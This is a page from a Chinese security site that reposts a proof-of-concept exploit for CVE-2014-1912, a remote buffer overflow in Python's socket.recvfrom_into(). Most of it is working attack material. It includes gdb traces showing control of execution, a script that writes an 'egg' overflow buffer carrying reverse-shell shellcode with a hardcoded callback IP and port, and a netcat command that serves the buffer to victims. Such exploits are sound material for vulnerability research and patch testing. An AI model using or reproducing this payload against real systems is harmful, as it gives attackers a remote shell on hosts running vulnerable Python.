首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Python socket.recvfrom_into() remote buffer overflow exploit
来源:@sha0coder 作者:Sha0 发布时间:2014-02-24  
#!/usr/bin/env python
  
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
  
  
  
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
  
TODO: rop to evade stack nx 
  
  
(gdb) x/i $eip
=> 0x817bb28:        mov    eax,DWORD PTR [ebx+0x4]       <--- ebx full control => eax full conrol
   0x817bb2b:   test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:   jne    0x817bb38 -->
   ...
   0x817bb38:   mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
   0x817bb3e:   test   eax,eax
   0x817bb40:   jne    0x817bb58 -->
   ...
   0x817bb58:   mov    DWORD PTR [esp],ebx
   0x817bb5b:   call   eax <--------------------- indirect fucktion call ;)
  
  
$ ./pyrecvfrominto.py 
        egg file generated
  
$ cat egg | nc -l 8080 -vv
  
... when client connects ... or wen we send the evil buffer to the server ...
  
0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c:        int3                            <--------- LANDED!!!!!
   0x838591d:   xor    eax,eax
   0x838591f:   xor    ebx,ebx
   0x8385921:   xor    ecx,ecx
   0x8385923:   xor    edx,edx
  
'''
  
import struct
  
def off(o):
        return struct.pack('L',o)
  
  
reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
reversePort = '\x7a\x69'
  
  
#shellcode from exploit-db.com, (remove the sigtrap)
shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
                        "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\
                        "\x01\x6a\x02\x89\xe1\xcd\x80\x89"\
                        "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\
                        reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\
                        "\xc3\x89\xe1\x6a\x10\x51\x56\x89"\
                        "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\
                        "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\
                        "\xc0\x52\x68\x6e\x2f\x73\x68\x68"\
                        "\x2f\x2f\x62\x69\x89\xe3\x52\x53"\
                        "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\
                        "\x80"
  
  
shellcode_sz = len(shellcode)
  
print 'shellcode sz %d' % shellcode_sz
  
  
ebx =  0x08385908
sc_off = 0x08385908+20
  
padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
  
'''           
        +------------+----------------------+         +--------------------+
        |            |                      |         |                    |
        V            |                      |         V                    |
'''
buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)
  
  
print 'buff sz: %s' % len(buff)
open('egg','w').write(buff)
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec Endpoint Protection M
·Embedthis Goahead 3.1.3-0 Deni
·SolidWorks Workgroup PDM 2014
·Python socket.recvfrom_into()
·Mini HTTPD 1.21 - Stack Buffer
·Symantec Endpoint Protection M
·GoAhead Web Server 3.1.x - Den
·Catia V5-6R2013 "CATV5_Backbon
·GoldMP4Player Buffer Overflow
·VideoCharge Studio 2.12.3.685
·GoldMP4Player 3.3 - Buffer Ove
·WRT120N 1.0.0.7 Stack Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved